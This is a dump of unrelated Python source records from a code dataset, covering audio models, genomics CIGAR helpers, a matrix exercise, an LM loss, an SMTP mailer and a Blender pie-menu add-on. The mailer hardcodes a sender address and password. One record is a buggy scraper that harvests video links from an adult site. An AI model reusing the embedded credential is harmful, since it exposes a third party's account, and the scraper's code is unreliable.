print(t)\r\n\r\n'''\r\n\r\n\r\nc=['Ford','BMW','Volvo']\r\nb=c.sort()\r\nprint(b)\r\n\r\n","sub_path":"replace.py","file_name":"replace.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"486235431","text":"import ddsp.training\nimport gin\n\n\nclass DDSPGenerator:\n def __init__(self, checkpoint_path: str, gin_config: str):\n self.model = None\n self.checkpoint_path = checkpoint_path\n self.gin_config = gin_config\n self._load_model()\n\n def _load_model(self):\n gin.parse_config_file(self.gin_config)\n self.model = ddsp.training.models.Autoencoder(encoder=None)\n self.model.restore(self.checkpoint_path)\n\n def predict(self, inputs):\n outputs = self.model(inputs, training=False)\n return 
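# --- Illustrative sketch: add_to_parent_tier() above slices the flat child
# list into per-parent runs; the same indexing on plain lists makes the
# arithmetic easy to verify. The names here are invented for the example.
parents = ['shelf-0', 'shelf-1']
items = ['rack-{}'.format(i) for i in range(6)]  # 3 racks per shelf
items_per_parent = 3
for j in range(len(parents)):
    k = items_per_parent
    print(parents[j], items[j * k:(j * k) + k])
# shelf-0 ['rack-0', 'rack-1', 'rack-2']
# shelf-1 ['rack-3', 'rack-4', 'rack-5']
# --- end sketch ---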
self.model.get_audio_from_outputs(outputs)\n","sub_path":"sound_generator/sound_generator/ddsp_generator/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"52658735","text":"#!/usr/bin/env python\n#python 3\n#Contact, Adam Taranto, aptaranto@ucdavis.edu\n\n##########################################################################\n# Find soft-clipped alignments containing unassembled telomeric repeats. #\n##########################################################################\n\nimport os\nimport sys\nimport re\n\n__version__ = \"0.0.2\"\n\nclass Error (Exception): pass\n\ndef isfile(path):\n \"\"\"\n Test for existence of input file.\n \"\"\"\n path = os.path.abspath(path)\n if not os.path.isfile(path):\n print(\"Input file not found: %s\" % path)\n sys.exit(1)\n else:\n return path\n\ndef read_fai(fai):\n \"\"\"\n Import fasta index file. Return dict of sequence names and lengths.\n \"\"\"\n path = isfile(fai)\n # Init empty dict\n ContigDict = dict()\n # Read fai_file to dict\n with open(path, \"rU\") as f:\n for line in f.readlines():\n li = line.strip().split()\n ContigDict[li[0]]=int(li[1])\n return ContigDict\n\ndef addRevComplement(motifList):\n \"\"\"\n Take list of DNA motif strings and return unique set of strings and their reverse complements.\n \"\"\"\n revcompl = lambda x: ''.join([{'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A', 'N':'N'}[B] for B in x][::-1])\n setList = list()\n for motif in motifList:\n setList.append(motif)\n setList.append(revcompl(motif))\n return set(setList)\n\ndef splitCIGAR(SAM_CIGAR):\n \"\"\"\n Split CIGAR string into list of tuples with format (len,operator)\n \"\"\"\n CIGARlist = list()\n for x in re.findall('[0-9]*[A-Z|=]',SAM_CIGAR):\n CIGARlist.append((int(re.findall('[0-9]*', x)[0]),re.findall('[A-Z]|=', x)[0]))\n #174M76S --> [(174,M),(76,S)]\n #96S154M --> [(96,S),(154,M)]\n return CIGARlist\n\ndef lenCIGAR(SAM_CIGAR):\n \"\"\"\n Calculate length of alignment in reference sequence as sum of \n match, read-deletion, splice, mismatch, and read-match block values.\n Ignore read-insertions, padding, hard and soft clip blocks.\n \"\"\"\n alnLen = 0\n CIGARlist = splitCIGAR(SAM_CIGAR)\n for x in CIGARlist: # i.e. 
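# --- Illustrative sketch: hypothetical usage of the DDSPGenerator wrapper
# above. The paths are placeholders, and `inputs` must contain whatever
# conditioning features the restored autoencoder expects (typically f0_hz
# and loudness_db for DDSP models).
# gen = DDSPGenerator('ckpt/model', 'operative_config.gin')
# audio = gen.predict({'f0_hz': f0, 'loudness_db': loudness})
# --- end sketch ---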
= [(174,M),(76,S)]\n if x[1] in set(['D','M','N','X','=']):\n alnLen += x[0]\n #Ignore operators in set('P','H','S','I')\n return alnLen\n\ndef checkClips(SAM_CIGAR):\n \"\"\"\n Get lengths of soft-clipped blocks from either end of an alignment given a CIGAR string.\n \"\"\"\n leftClipLen = None\n rightClipLen = None\n CIGARlist = splitCIGAR(SAM_CIGAR)\n # Check if first segment is soft-clipped\n if CIGARlist[0][1] == \"S\" :\n leftClipLen = int(CIGARlist[0][0])\n # Check if last segment is soft-clipped\n if CIGARlist[-1][1] == \"S\" :\n rightClipLen = int(CIGARlist[-1][0])\n return (leftClipLen,rightClipLen)\n\ndef isClipMotif(samline,motifList,leftClip,rightClip,leftClipLen,rightClipLen):\n \"\"\"\n Extract terminal soft-clipped blocks from read sequence and test for presence of any DNA motif in motifList.\n \"\"\"\n clipSeq = list()\n SAM_SEQ = 9\n if leftClip:\n clipSeq.append(samline[SAM_SEQ][0:leftClipLen])\n if rightClip:\n clipSeq.append(samline[SAM_SEQ][-rightClipLen:])\n # True if either clipped end sequence contains at least one instance of any motif\n return any(s in x for s in motifList for x in clipSeq)\n\n\"\"\"\nCIGAR Operators\n--------------------\nD Deletion; the nucleotide is present in the reference but not in the read\nH Hard Clipping; the clipped nucleotides are not present in the read.\nI Insertion; the nucleotide is present in the read but not in the rference.\nM Match; can be either an alignment match or mismatch. The nucleotide is present in the reference.\nN Skipped region; a region of nucleotides is not present in the read\nP Padding; padded area in the read and not in the reference\nS Soft Clipping; the clipped nucleotides are present in the read\nX Read Mismatch; the nucleotide is present in the reference\n= Read Match; the nucleotide is present in the reference\n\nThe output order in the array is “MIDNSHP=X” followed by a field for the NM tag. 
If the NM tag is not present, this field will always be 0.\n\nM BAM_CMATCH 0\nI BAM_CINS 1\nD BAM_CDEL 2\nN BAM_CREF_SKIP 3\nS BAM_CSOFT_CLIP 4\nH BAM_CHARD_CLIP 5\nP BAM_CPAD 6\n= BAM_CEQUAL 7\nX BAM_CDIFF 8\nB BAM_CBACK 9\nNM NM tag 10 \n\"\"\"\n","sub_path":"teloclip/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"357276961","text":"import asyncio\nimport csv\nimport os\n\nfrom requests_html import HTMLSession\n\nsession = HTMLSession()\nids = None\nwriter = None\nfile_name = 'pornhub_nom_co.csv'\ncsv_header = ['id', 'title', 'time', 'url', 'type']\n\n\nasync def crawl_channels():\n \"\"\"\n 爬取 channel\n \"\"\"\n res = await async_get('http://www.pornhub.nom.co/channels/')\n channels = res.html.xpath(\"//ul[@class='simple-list simple-list--channels']/li/a\")\n results = []\n for channel in channels:\n count = int(channel.xpath(\"*/span[@class='counter']\")[0].text)\n attrs = channel.attrs\n name = attrs.get('title')\n if count != 0:\n url = attrs.get('href')\n fragments = []\n fragments = await crawl_fragments(url, name)\n print('爬取频道 {},应有毛片数量 {},实际数量 {}'.format(name, count, len(fragments)))\n results.extend(fragments)\n else:\n print('频道 {} 没有毛片')\n print('爬取完毕,共爬取到 {} 毛片'.format(len(results)))\n print('开始存入本地文件中')\n for f in results:\n video = await crawl_video(f['url'])\n id = video[0]\n f['id'] = id\n f['url'] = video[1]\n await write_video(f)\n print('写入完毕,文件位置 {}'.format(file_name))\n\n\nasync def write_video(video_info):\n id = video_info['id']\n if id not in ids:\n writer.writerow(f)\n ids.append(id)\n else:\n print('video', id, 'has existed')\n\n\nasync def crawl_fragments(start_url, type):\n \"\"\"\n 爬取 channel 下的毛片。\n 如果有分页,也会一直爬完。\n 使用队列,变递归为非递归\n \"\"\"\n urls = [start_url, ]\n fragments = []\n\n for u in urls:\n res = await async_get(u)\n content = res.html.xpath(\"//main[@class='main-col']/div[@class='main-inner-col inner-col']\")[0]\n items = content.xpath(\n \"*/div[@class='box-container']/div[@class='inner-box-container']/div[@class='row']/div[@class='item-col col']/div[@class='item-inner-col inner-col']/a[1]\")\n for item in items:\n attrs = item.attrs\n title = attrs.get('title')\n time = item.xpath(\"*/span[@class='image']/span[@class='time']\")[0].text\n f_url = attrs.get('href')\n fragments.append({\n 'title': title,\n 'time': time,\n 'url': f_url,\n 'type': type\n })\n # 判断是否还有下一页\n next = content.xpath(\n \"*/nav[@class='pagination-col col pagination']/div[@class='pagination-inner-col inner-col']/a[@class='next']\")\n # 使用url队列,变递归为非递归\n if (len(next) == 1):\n urls.append(*next[0].absolute_links)\n return fragments\n\n\nasync def crawl_video(url):\n \"\"\"\n 爬取 video 的真正地址,分为两步\n 第一步,进入到上面的播放页面,由于播放器是使用的 iframe 嵌套,仍需找到真正的播放页面\n 第二步,进入真正播放器的页面,找打video地址\n \"\"\"\n res = await async_get(url)\n iframe_url = res.html.xpath(\"//iframe/@src\")[0]\n id = iframe_url[iframe_url.rfind('/') + 1:]\n res = await async_get(iframe_url)\n video_url = res.html.xpath(\"//video/source[@res='480']/@src\")[0]\n return (id, video_url)\n\n\nasync def async_get(url):\n \"\"\"\n 将 get 请求封装为非阻塞\n :param url:\n :return:\n \"\"\"\n temp_loop = asyncio.get_event_loop()\n response = await temp_loop.run_in_executor(None, session.get, url)\n return response\n\n\nif __name__ == '__main__':\n print(\"开始爬取,请稍后,时间会较长\")\n is_exist = os.path.exists(file_name)\n if is_exist:\n with open(file_name) as f:\n reader = csv.DictReader(f)\n ids = [row['id'] for row in 
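# --- Illustrative sketch: exercises the CIGAR helpers defined above on the
# strings quoted in their own comments, assuming the module's functions are
# importable as-is.
print(splitCIGAR('174M76S'))  # [(174, 'M'), (76, 'S')]
print(lenCIGAR('174M76S'))    # 174 -- the soft clip adds no reference length
print(checkClips('96S154M'))  # (96, None) -- left clip only
# --- end sketch ---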
reader]\n else:\n ids = []\n\n with open('a.csv', 'a+', newline='') as f:\n writer = csv.DictWriter(f, csv_header)\n if not is_exist:\n writer.writeheader()\n loop = asyncio.get_event_loop()\n # loop.run_until_complete(crawl_video('http://www.pornhub.nom.co/video/naughty-america-lacey-channing-250.html'))\n # loop.run_until_complete(crawl_fragments('http://www.pornhub.nom.co/channels/8/blowjobs/', 'blowjobs'))\n loop.run_until_complete(crawl_channels())\n print('完毕,退出程序')\n","sub_path":"pornhub_nom_co/channels.py","file_name":"channels.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"282566900","text":"#!/usr/bin/python3\n\"\"\"\nmultiple a matrix using numpy\n\"\"\"\nimport numpy as np\n\n\ndef lazy_matrix_mul(m_a, m_b):\n \"\"\"\n multiple two matrix withe different size\n exemple:\n A = [[1, 2], [2, 3]] * [[1, 2], [2, 3]]\n A = [[7, 10], [15, 22]]\n\n B = [[1, 1]] * [[1, 1]]\n B = [1, 1]\n \"\"\"\n if type(m_a) != list:\n raise TypeError(\"m_a must be a list\")\n if type(m_b) != list:\n raise TypeError(\"m_b must be a list\")\n\n if type(m_a) == list and type(m_a[0]) == list:\n row_size_a = len(m_a[0])\n if type(m_b) == list and type(m_b[0]) == list:\n row_size_b = len(m_b[0])\n\n for i in m_a:\n if type(i) != list:\n raise TypeError(\"m_a must be a list of lists\")\n if len(m_a) == 0 or len(i) == 0:\n raise ValueError(\"m_a can't be empty\")\n if len(i) != row_size_a:\n raise TypeError(\"each row of m_a must be of the same size\")\n for j in i:\n if type(j) not in [float, int]:\n raise TypeError(\"m_a should contain only integers or floats\")\n for i in m_b:\n if type(i) != list:\n raise TypeError(\"m_b must be a list of lists\")\n if len(m_b) == 0 or len(i) == 0:\n raise ValueError(\"m_b can't be empty\")\n if len(i) != row_size_b:\n raise TypeError(\"each row of m_b must be of the same size\")\n for j in i:\n if type(j) not in [float, int]:\n raise TypeError(\"m_b should contain only integers or floats\")\n A = np.array(m_a)\n B = np.array(m_b)\n new = np.matmul(A, B)\n return new\n","sub_path":"0x07-python-test_driven_development/101-lazy_matrix_mul.py","file_name":"101-lazy_matrix_mul.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"440383029","text":"import torch\n\nclass LanguageModelingLossCompute:\n \" A Loss compute and train function for language modeling tasks.\"\n def __init__(self, lm_criterion, opt=None):\n self.lm_criterion = lm_criterion\n self.opt = opt\n\n # def __call__(self, X, Y, M, clf_logits, lm_logits=None, only_return_losses=False):\n def __call__(self, X, Y, M, lm_logits, only_return_losses=False):\n # Language modeling loss\n x_shifted = X[:, 1:, 0].contiguous().view(-1)\n M = M.view(-1, M.size(-1))\n lm_losses = self.lm_criterion(lm_logits, x_shifted)\n lm_losses = lm_losses.view(X.size(0), X.size(-2) - 1)\n lm_losses = lm_losses * M[:, 1:]\n lm_losses = lm_losses.sum(1) / torch.sum(M[:, 1:], 1)\n if only_return_losses:\n return lm_losses\n\n train_loss = lm_losses.sum()\n train_loss.backward()\n if self.opt is not None:\n self.opt.step()\n self.opt.zero_grad()\n return train_loss.item()\n","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"588714619","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport sys, 
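# --- Illustrative sketch: lazy_matrix_mul above only validates inputs and
# then delegates to numpy; this is the delegated call on the docstring's
# example matrices. (Note the true product is [[5, 8], [8, 13]]; the
# docstring's [[7, 10], [15, 22]] is the square of [[1, 2], [3, 4]].)
import numpy as np

print(np.matmul(np.array([[1, 2], [2, 3]]), np.array([[1, 2], [2, 3]])))
# [[ 5  8]
#  [ 8 13]]
# --- end sketch ---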
getopt\nimport argparse\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom email.header import Header\nfrom email.utils import formataddr\nimport smtplib\n\ndef sending(receivers,subject,content,attach):\n sender = 'jumpserver@idongjia.cn'\n password = 'aS7WSGwEJBtwh4re'\n message = MIMEMultipart()\n #message['From'] = Header(\"数据组\", 'utf-8')\n #message['To'] = Header(\"拍卖\", 'utf-8')\n message['From'] = formataddr([\"数据组\",sender])\n\n message['To'] = formataddr([\"数据组成员\",receivers])\n\n message['Subject'] = Header(subject, 'utf-8')\n\n message.attach(MIMEText(content+u'\\n\\n\\n超级无敌通知系统2018.04.18','plain', 'utf-8'))\n if attach is not None:\n print (attach)\n att1 = MIMEText(open(attach, 'rb').read(), 'base64', 'utf-8')\n att1[\"Content-Type\"] = 'application/octet-stream'\n att1[\"Content-Disposition\"] = 'attachment; '+'filename='+attach\n message.attach(att1)\n try:\n server=smtplib.SMTP_SSL(\"smtp.exmail.qq.com\", 465)\n server.login(sender, password)\n server.sendmail(sender,receivers,message.as_string())\n print (\"邮件发送成功\")\n except smtplib.SMTPException:\n print (\"Error: 无法发送邮件\")\n\ndef main(argv):\n parser = argparse.ArgumentParser()\n parser.add_argument('--target', '-T',\n type=str, \n help='mail_to_those_target_adresss: --target a@qq.com b@qq.com',\n nargs='+',\n default=['shuju@idongjia.cn'])\n parser.add_argument('--subject','-S',\n type=str,\n help='the subject of the mail',\n nargs=1,\n default=['job_failed'])\n\n parser.add_argument('--content','-C',\n type=str,\n help='content for the mail',\n nargs=1,\n default=[''])\n\n parser.add_argument('--attach','-A',\n type=str,\n help='attachment for the mail: --attach /data/myfile.txt',\n nargs=1,\n default=[None])\n\n args = parser.parse_args()\n print (args.target,args.subject,args.attach,args.content)\n\n sending(args.target,args.subject[0],args.content[0],args.attach[0])\n\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"utils/sendmail.py","file_name":"sendmail.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"128957315","text":"class Solution:\n def canVisitAllRooms(self, rooms):\n \"\"\"\n :type rooms: List[List[int]]\n :rtype: bool\n \"\"\"\n self.visited = [False for i in range(len(rooms))]\n self.rooms = rooms\n # Start from room 0\n self.visitRoom(0)\n return all(self.visited)\n #return False if False in self.visited else True\n\n def visitRoom(self, curr):\n self.visited[curr] = True\n for keys_to in self.rooms[curr]:\n if not self.visited[keys_to]:\n self.visitRoom(keys_to)\n\n\nprint (Solution().canVisitAllRooms([[1],[2],[3],[]]))\nprint (Solution().canVisitAllRooms([[1,3],[3,0,1],[2],[0]]))","sub_path":"leet/keysAndRooms.py","file_name":"keysAndRooms.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"37195612","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
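# --- Illustrative sketch: the recursive room walk above can also be written
# iteratively with an explicit stack, which avoids recursion-depth limits on
# long key chains. Same inputs and answers as the record's own test calls.
def can_visit_all_rooms(rooms):
    visited = [False] * len(rooms)
    stack = [0]  # every search starts from room 0
    while stack:
        cur = stack.pop()
        if not visited[cur]:
            visited[cur] = True
            stack.extend(k for k in rooms[cur] if not visited[k])
    return all(visited)

print(can_visit_all_rooms([[1], [2], [3], []]))            # True
print(can_visit_all_rooms([[1, 3], [3, 0, 1], [2], [0]]))  # False
# --- end sketch ---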
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# \n\nbl_info = {\n \"name\": \"Hotkey: 'O'\",\n \"description\": \"Proportional Object/Edit Tools\",\n \"author\": \"pitiwazou, meta-androcto\",\n \"version\": (0, 1, 1),\n \"blender\": (2, 80, 0),\n \"location\": \"3D View Object & Edit modes\",\n \"warning\": \"\",\n \"wiki_url\": \"\",\n \"category\": \"Proportional Edit Pie\"\n }\n\nimport bpy\nfrom bpy.types import (\n Menu,\n Operator,\n )\n\n\n# Proportional Edit Object\nclass ProportionalEditObj(Operator):\n bl_idname = \"proportional_obj.active\"\n bl_label = \"Proportional Edit Object\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n\n if ts.use_proportional_edit_objects is True:\n ts.use_proportional_edit_objects = False\n\n elif ts.use_proportional_edit_objects is False:\n ts.use_proportional_edit_objects = True\n\n return {'FINISHED'}\n\n\nclass ProportionalSmoothObj(Operator):\n bl_idname = \"proportional_obj.smooth\"\n bl_label = \"Proportional Smooth Object\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.use_proportional_edit_objects is False:\n ts.use_proportional_edit_objects = True\n ts.proportional_edit_falloff = 'SMOOTH'\n\n if ts.proportional_edit_falloff != 'SMOOTH':\n ts.proportional_edit_falloff = 'SMOOTH'\n return {'FINISHED'}\n\n\nclass ProportionalSphereObj(Operator):\n bl_idname = \"proportional_obj.sphere\"\n bl_label = \"Proportional Sphere Object\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.use_proportional_edit_objects is False:\n ts.use_proportional_edit_objects = True\n ts.proportional_edit_falloff = 'SPHERE'\n\n if ts.proportional_edit_falloff != 'SPHERE':\n ts.proportional_edit_falloff = 'SPHERE'\n return {'FINISHED'}\n\n\nclass ProportionalRootObj(Operator):\n bl_idname = \"proportional_obj.root\"\n bl_label = \"Proportional Root Object\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.use_proportional_edit_objects is False:\n ts.use_proportional_edit_objects = True\n ts.proportional_edit_falloff = 'ROOT'\n\n if ts.proportional_edit_falloff != 'ROOT':\n ts.proportional_edit_falloff = 'ROOT'\n return {'FINISHED'}\n\n\nclass ProportionalSharpObj(Operator):\n bl_idname = \"proportional_obj.sharp\"\n bl_label = \"Proportional Sharp Object\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.use_proportional_edit_objects is False:\n ts.use_proportional_edit_objects = True\n ts.proportional_edit_falloff = 'SHARP'\n\n if ts.proportional_edit_falloff != 'SHARP':\n ts.proportional_edit_falloff = 'SHARP'\n return {'FINISHED'}\n\n\nclass ProportionalLinearObj(Operator):\n bl_idname = \"proportional_obj.linear\"\n bl_label = \"Proportional Linear Object\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.use_proportional_edit_objects is False:\n ts.use_proportional_edit_objects = True\n ts.proportional_edit_falloff = 'LINEAR'\n\n if ts.proportional_edit_falloff != 'LINEAR':\n ts.proportional_edit_falloff = 'LINEAR'\n return {'FINISHED'}\n\n\nclass 
ProportionalConstantObj(Operator):\n bl_idname = \"proportional_obj.constant\"\n bl_label = \"Proportional Constant Object\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.use_proportional_edit_objects is False:\n ts.use_proportional_edit_objects = True\n ts.proportional_edit_falloff = 'CONSTANT'\n\n if ts.proportional_edit_falloff != 'CONSTANT':\n ts.proportional_edit_falloff = 'CONSTANT'\n return {'FINISHED'}\n\n\nclass ProportionalRandomObj(Operator):\n bl_idname = \"proportional_obj.random\"\n bl_label = \"Proportional Random Object\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.use_proportional_edit_objects is False:\n ts.use_proportional_edit_objects = True\n ts.proportional_edit_falloff = 'RANDOM'\n\n if ts.proportional_edit_falloff != 'RANDOM':\n ts.proportional_edit_falloff = 'RANDOM'\n return {'FINISHED'}\n\n\n# Proportional Edit Edit Mode\nclass ProportionalEditEdt(Operator):\n bl_idname = \"proportional_edt.active\"\n bl_label = \"Proportional Edit EditMode\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n\n if ts.proportional_edit != ('DISABLED'):\n ts.proportional_edit = 'DISABLED'\n elif ts.proportional_edit != ('ENABLED'):\n ts.proportional_edit = 'ENABLED'\n return {'FINISHED'}\n\n\nclass ProportionalConnectedEdt(Operator):\n bl_idname = \"proportional_edt.connected\"\n bl_label = \"Proportional Connected EditMode\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.proportional_edit != ('CONNECTED'):\n ts.proportional_edit = 'CONNECTED'\n return {'FINISHED'}\n\n\nclass ProportionalProjectedEdt(Operator):\n bl_idname = \"proportional_edt.projected\"\n bl_label = \"Proportional projected EditMode\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n\n if ts.proportional_edit != ('PROJECTED'):\n ts.proportional_edit = 'PROJECTED'\n return {'FINISHED'}\n\n\nclass ProportionalSmoothEdt(Operator):\n bl_idname = \"proportional_edt.smooth\"\n bl_label = \"Proportional Smooth EditMode\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.proportional_edit == 'DISABLED':\n ts.proportional_edit = 'ENABLED'\n ts.proportional_edit_falloff = 'SMOOTH'\n\n if ts.proportional_edit_falloff != 'SMOOTH':\n ts.proportional_edit_falloff = 'SMOOTH'\n return {'FINISHED'}\n\n\nclass ProportionalSphereEdt(Operator):\n bl_idname = \"proportional_edt.sphere\"\n bl_label = \"Proportional Sphere EditMode\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.proportional_edit == 'DISABLED':\n ts.proportional_edit = 'ENABLED'\n ts.proportional_edit_falloff = 'SPHERE'\n\n if ts.proportional_edit_falloff != 'SPHERE':\n ts.proportional_edit_falloff = 'SPHERE'\n return {'FINISHED'}\n\n\nclass ProportionalRootEdt(Operator):\n bl_idname = \"proportional_edt.root\"\n bl_label = \"Proportional Root EditMode\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.proportional_edit == 'DISABLED':\n ts.proportional_edit = 'ENABLED'\n ts.proportional_edit_falloff = 'ROOT'\n\n if ts.proportional_edit_falloff != 'ROOT':\n ts.proportional_edit_falloff = 'ROOT'\n return {'FINISHED'}\n\n\nclass ProportionalSharpEdt(Operator):\n bl_idname = \"proportional_edt.sharp\"\n bl_label = \"Proportional Sharp 
EditMode\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.proportional_edit == 'DISABLED':\n ts.proportional_edit = 'ENABLED'\n ts.proportional_edit_falloff = 'SHARP'\n\n if ts.proportional_edit_falloff != 'SHARP':\n ts.proportional_edit_falloff = 'SHARP'\n return {'FINISHED'}\n\n\nclass ProportionalLinearEdt(Operator):\n bl_idname = \"proportional_edt.linear\"\n bl_label = \"Proportional Linear EditMode\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.proportional_edit == 'DISABLED':\n ts.proportional_edit = 'ENABLED'\n ts.proportional_edit_falloff = 'LINEAR'\n\n if ts.proportional_edit_falloff != 'LINEAR':\n ts.proportional_edit_falloff = 'LINEAR'\n return {'FINISHED'}\n\n\nclass ProportionalConstantEdt(Operator):\n bl_idname = \"proportional_edt.constant\"\n bl_label = \"Proportional Constant EditMode\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.proportional_edit == 'DISABLED':\n ts.proportional_edit = 'ENABLED'\n ts.proportional_edit_falloff = 'CONSTANT'\n\n if ts.proportional_edit_falloff != 'CONSTANT':\n ts.proportional_edit_falloff = 'CONSTANT'\n return {'FINISHED'}\n\n\nclass ProportionalRandomEdt(Operator):\n bl_idname = \"proportional_edt.random\"\n bl_label = \"Proportional Random EditMode\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.proportional_edit == 'DISABLED':\n ts.proportional_edit = 'ENABLED'\n ts.proportional_edit_falloff = 'RANDOM'\n\n if ts.proportional_edit_falloff != 'RANDOM':\n ts.proportional_edit_falloff = 'RANDOM'\n return {'FINISHED'}\n\n\n# Pie ProportionalEditObj - O\nclass PieProportionalObj(Menu):\n bl_idname = \"pie.proportional_obj\"\n bl_label = \"Pie Proportional Obj\"\n\n def draw(self, context):\n layout = self.layout\n pie = layout.menu_pie()\n # 4 - LEFT\n pie.operator(\"proportional_obj.sphere\", text=\"Sphere\", icon='SPHERECURVE')\n # 6 - RIGHT\n pie.operator(\"proportional_obj.root\", text=\"Root\", icon='ROOTCURVE')\n # 2 - BOTTOM\n pie.operator(\"proportional_obj.smooth\", text=\"Smooth\", icon='SMOOTHCURVE')\n # 8 - TOP\n pie.prop(context.tool_settings, \"use_proportional_edit_objects\", text=\"Proportional On/Off\")\n # 7 - TOP - LEFT\n pie.operator(\"proportional_obj.linear\", text=\"Linear\", icon='LINCURVE')\n # 9 - TOP - RIGHT\n pie.operator(\"proportional_obj.sharp\", text=\"Sharp\", icon='SHARPCURVE')\n # 1 - BOTTOM - LEFT\n pie.operator(\"proportional_obj.constant\", text=\"Constant\", icon='NOCURVE')\n # 3 - BOTTOM - RIGHT\n pie.operator(\"proportional_obj.random\", text=\"Random\", icon='RNDCURVE')\n\n\n# Pie ProportionalEditEdt - O\nclass PieProportionalEdt(Menu):\n bl_idname = \"pie.proportional_edt\"\n bl_label = \"Pie Proportional Edit\"\n\n def draw(self, context):\n layout = self.layout\n pie = layout.menu_pie()\n # 4 - LEFT\n pie.operator(\"proportional_edt.connected\", text=\"Connected\", icon='PROP_CON')\n # 6 - RIGHT\n pie.operator(\"proportional_edt.projected\", text=\"Projected\", icon='PROP_ON')\n # 2 - BOTTOM\n pie.operator(\"proportional_edt.smooth\", text=\"Smooth\", icon='SMOOTHCURVE')\n # 8 - TOP\n pie.operator(\"proportional_edt.active\", text=\"Proportional On/Off\", icon='PROP_ON')\n # 7 - TOP - LEFT\n pie.operator(\"proportional_edt.sphere\", text=\"Sphere\", icon='SPHERECURVE')\n # 9 - TOP - RIGHT\n pie.operator(\"proportional_edt.root\", text=\"Root\", icon='ROOTCURVE')\n # 
1 - BOTTOM - LEFT\n pie.operator(\"proportional_edt.constant\", text=\"Constant\", icon='NOCURVE')\n # 3 - BOTTOM - RIGHT\n pie.menu(\"pie.proportional_more\", text=\"More\", icon='LINCURVE')\n\n\n# Pie ProportionalEditEdt - O\nclass PieProportionalMore(Menu):\n bl_idname = \"pie.proportional_more\"\n bl_label = \"Pie Proportional More\"\n\n def draw(self, context):\n layout = self.layout\n pie = layout.menu_pie()\n box = pie.split().column()\n box.operator(\"proportional_edt.linear\", text=\"Linear\", icon='LINCURVE')\n box.operator(\"proportional_edt.sharp\", text=\"Sharp\", icon='SHARPCURVE')\n box.operator(\"proportional_edt.random\", text=\"Random\", icon='RNDCURVE')\n\n\nclasses = (\n ProportionalEditObj,\n ProportionalSmoothObj,\n ProportionalSphereObj,\n ProportionalRootObj,\n ProportionalSharpObj,\n ProportionalLinearObj,\n ProportionalConstantObj,\n ProportionalRandomObj,\n ProportionalEditEdt,\n ProportionalConnectedEdt,\n ProportionalProjectedEdt,\n ProportionalSmoothEdt,\n ProportionalSphereEdt,\n ProportionalRootEdt,\n ProportionalSharpEdt,\n ProportionalLinearEdt,\n ProportionalConstantEdt,\n ProportionalRandomEdt,\n PieProportionalObj,\n PieProportionalEdt,\n PieProportionalMore,\n )\n\naddon_keymaps = []\n\n\ndef register():\n for cls in classes:\n bpy.utils.register_class(cls)\n\n wm = 